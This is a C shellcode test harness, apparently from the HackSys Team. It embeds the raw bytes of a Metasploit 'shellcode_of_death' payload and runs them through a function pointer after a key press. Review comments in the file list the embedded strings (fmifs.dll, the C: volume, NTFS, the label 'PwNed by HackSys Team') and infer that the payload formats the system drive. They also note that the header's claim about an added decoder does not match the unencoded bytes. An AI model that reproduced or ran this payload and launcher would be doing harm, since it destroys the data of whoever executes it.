ShellcodeTestMetasploitUnEncoded.c
#include <stdio.h>
#include <string.h>
/*
_ __ _____
/\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
/ /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
/ __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
\/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
|___/
http://hacksys.vfreaks.com/
Module Name:
Shellcode Test Encoded
Abstract:
This program is used as a template to test
C style formatted shellcodes. A decoder is
already added to the final shellcode output.
IDE:
Dev-C++ 4.9.9.2 (Windows XP SP3)
Compiler:
gcc 3.4.2
*/
/*
* windows/shellcode_of_death - 425 bytes
* http://www.metasploit.com
* VERBOSE=false, VOLUMELABEL=PwNed by HackSys Team
*/
/*
 * Raw payload bytes, stored as a C string literal: 28 rows of 15 bytes plus a
 * final row of 5 bytes = 425 bytes, matching the size in the Metasploit
 * comment above. The literal's implicit trailing NUL makes sizeof(shellcode)
 * 426, which is why the harness subtracts 1.
 *
 * Static indicators visible in the bytes (useful for triage and signatures):
 *   - ASCII   "fmifs.dll"
 *   - UTF-16LE "\\.\C:\", "NTFS" and "PwNed by HackSys Team" (the VOLUMELABEL
 *     option quoted in the comment above)
 * NOTE(review): these strings and the module name suggest a payload that
 * formats the C: volume; this is inferred from the embedded strings, not from
 * disassembly. If that reading is right, the harness belongs only in a
 * disposable analysis VM.
 *
 * NOTE(review): the bytes contain many 0x00 values and the file name says
 * "UnEncoded", so the file header's "A decoder is already added" does not
 * appear to apply to this payload. Confirm against the encoded variant.
 */
unsigned char shellcode[] =
"\xeb\x5a\x31\xc0\x8b\x34\x83\x01\xd6\x53\x50\x31\xdb\x31\xc0"
"\xac\xc1\xc3\x05\x01\xc3\x83\xf8\x00\x75\xf3\xc1\xcb\x05\x39"
"\xcb\x58\x5b\x74\x03\x40\xeb\xde\xc3\x89\xd0\x8b\x40\x3c\x8b"
"\x44\x02\x78\x8d\x04\x02\x50\x8b\x40\x20\x8d\x1c\x02\xe8\xc3"
"\xff\xff\xff\x5b\x8b\x4b\x24\x8d\x0c\x0a\x66\x8b\x04\x41\x25"
"\xff\xff\x00\x00\x8b\x5b\x1c\x8d\x1c\x1a\x8b\x04\x83\x8d\x04"
"\x02\xc3\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x40"
"\x1c\x8b\x50\x08\x8b\x78\x20\x8b\x00\x3a\x4f\x18\x75\xf3\x68"
"\x64\x5b\x02\xab\x68\x10\xa1\x67\x05\x68\xa7\xd4\x34\x3b\x68"
"\x96\x90\x62\xd7\x68\x87\x8f\x46\xec\x68\x06\xe5\xb0\xcf\x68"
"\xdc\xdd\x1a\x33\x89\xe5\x6a\x07\x59\x31\xff\x83\xf9\x01\x75"
"\x0c\x51\xeb\x1c\x8b\x44\x24\x1c\xff\xd0\x89\xc2\x59\x51\x8b"
"\x4c\xbd\x00\xe8\x6b\xff\xff\xff\x59\x50\x47\xe2\xe0\x89\xe5"
"\xeb\x0f\xe8\xdf\xff\xff\xff\x66\x6d\x69\x66\x73\x2e\x64\x6c"
"\x6c\x00\xeb\x7e\x5e\x6a\x17\x59\x89\xcf\x31\xd2\x52\x52\x6a"
"\x03\x52\x6a\x03\x68\x00\x00\x00\xc0\x56\x8b\x5d\x14\xff\xd3"
"\x50\x83\xec\x04\x31\xd2\x52\x8d\x5c\x24\x04\x53\x52\x52\x52"
"\x52\x68\x20\x00\x09\x00\x50\x8b\x5d\x08\xff\xd3\xff\x74\x24"
"\x04\x8b\x5d\x0c\xff\xd3\x8d\x86\x46\x00\x00\x00\x50\x68\x00"
"\x10\x00\x00\x6a\x01\x8d\x86\x1a\x00\x00\x00\x50\x8d\x86\x10"
"\x00\x00\x00\x50\x6a\x0c\x8d\x46\x08\x50\x8b\x5d\x00\xff\xd3"
"\x68\xc8\x00\x00\x00\x8b\x5d\x04\xff\xd3\x89\xf9\x83\x46\x08"
"\x01\xe2\x8d\x6a\x00\x8b\x5d\x10\xff\xd3\xe8\x7d\xff\xff\xff"
"\x5c\x00\x5c\x00\x2e\x00\x5c\x00\x43\x00\x3a\x00\x5c\x00\x00"
"\x00\x4e\x00\x54\x00\x46\x00\x53\x00\x00\x00\x50\x00\x77\x00"
"\x4e\x00\x65\x00\x64\x00\x20\x00\x62\x00\x79\x00\x20\x00\x48"
"\x00\x61\x00\x63\x00\x6b\x00\x53\x00\x79\x00\x73\x00\x20\x00"
"\x54\x00\x65\x00\x61\x00\x6d\x00\x00\x00\x55\x89\xe5\x31\xc0"
"\x40\x5d\xc2\x0c\x00";
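/*
 * Test harness entry point.
 *
 * Prints the payload length (array size minus the string literal's trailing
 * NUL), counts the 0x00 bytes in the payload (the only "bad character" this
 * harness checks for), waits for a key press, then calls the shellcode array
 * through a function pointer.
 *
 * Returns 0 if the payload returns control to the caller.
 */
int main(void)
{
    /* sizeof includes the implicit terminator of the string literal. */
    const size_t length = sizeof(shellcode) - 1;
    size_t i;               /* size_t index: avoids a signed/unsigned compare */
    int badchar_c = 0;

    /* sizeof yields size_t; cast so the argument really matches %d. */
    printf("\n\nShellcode Length: %d\n", (int)length);

    for (i = 0; i < length; ++i) {
        if (shellcode[i] == 0x00) {
            badchar_c = badchar_c + 1;
        }
    }

    printf("\nNumber of badchar: %d\n\n", badchar_c);
    printf("\nPress any key to execute shellcode....\n\n");

    /*
     * NOTE(review): getch() is not declared by <stdio.h> or <string.h>, the
     * only headers this file includes. Presumably it comes from <conio.h> on
     * the Dev-C++ toolchain named in the file header (confirm).
     */
    getch();

    /*
     * Converting an object pointer to a function pointer is not defined by
     * ISO C. The array lives in ordinary data storage, so on platforms that
     * enforce non-executable data pages this call faults instead of running
     * the payload.
     */
    int (*ret)() = (int(*)())shellcode;
    ret();

    return 0;
}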